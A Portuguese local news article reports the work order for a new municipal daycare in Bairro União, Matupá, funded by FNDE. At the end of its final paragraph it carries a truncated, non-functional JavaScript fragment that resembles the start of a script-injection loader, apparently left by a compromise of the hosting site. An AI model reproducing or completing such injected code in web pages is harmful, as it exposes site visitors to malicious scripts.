Capa / Cidades / Ordem de serviço para Construção da Creche Pró-Infância no Bairro União de Matupá

Ordem de serviço para Construção da Creche Pró-Infância no Bairro União de Matupá

Serão investidos mais de R$ 1,3 milhão na edificação do complexo educacional

28fc3d641ef95b1f6cNotícia Vip

O Prefeito Municipal, Valtinho Miotto, deu a ordem de serviço para o inicio das obras de construção da Creche Pró-infância do Bairro União. Informações preliminares dão conta de que a unidade de ensino deverá atender cerca de 94 crianças.

Os recursos da ordem de R$ 1.329.536,34 são provenientes do Fundo Nacional de Desenvolvimento da Educação – FNDE. A estrutura física contará com salas de aula, sala multiuso, sanitários, fraldários, recreio coberto, parque, refeitório, entre outros ambientes, que permitem a realização de atividades pedagógicas, recreativas, esportivas e de alimentação, além das administrativas e de serviço.

“Não temos dúvidas de que será um complexo educacional capaz de ofertar as crianças muito conforto e segurança, além do ensino pedagógico de qualidade, haverá toda atenção necessária para o seu efetivo crescimento e desenvolvimento físico e educacional. O propósito desta administração é avançar nos índices da educação e na qualidade de vida de todos os cidadãos Matupaenses. Com o funcionamento desta nova creche atenderemos praticamente 100% da demanda”, comentou o Prefeito Valtinho Miotto.

Ele lembrou que a Prefeitura está trabalhando com afinco para que em todos os bairros e comunidades haja o Núcleo da Cidadania, ou seja, um espaço público que reúna em sua extensão postos de saúde, creches, praças de lazer, academias de saúde, centros de multiplouso, miniestádios e quadras poliesportivas, e demais órgãos e serviços, como acontece no Bairro União.

A placa já foi afixada no local onde será edificada a nova creche municipal e brevemente a empreiteira dará início as obras, priorizando a aquisição de materiais, mão de obra e prestadores de serviços estabelecidos na cidade de Matupá.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top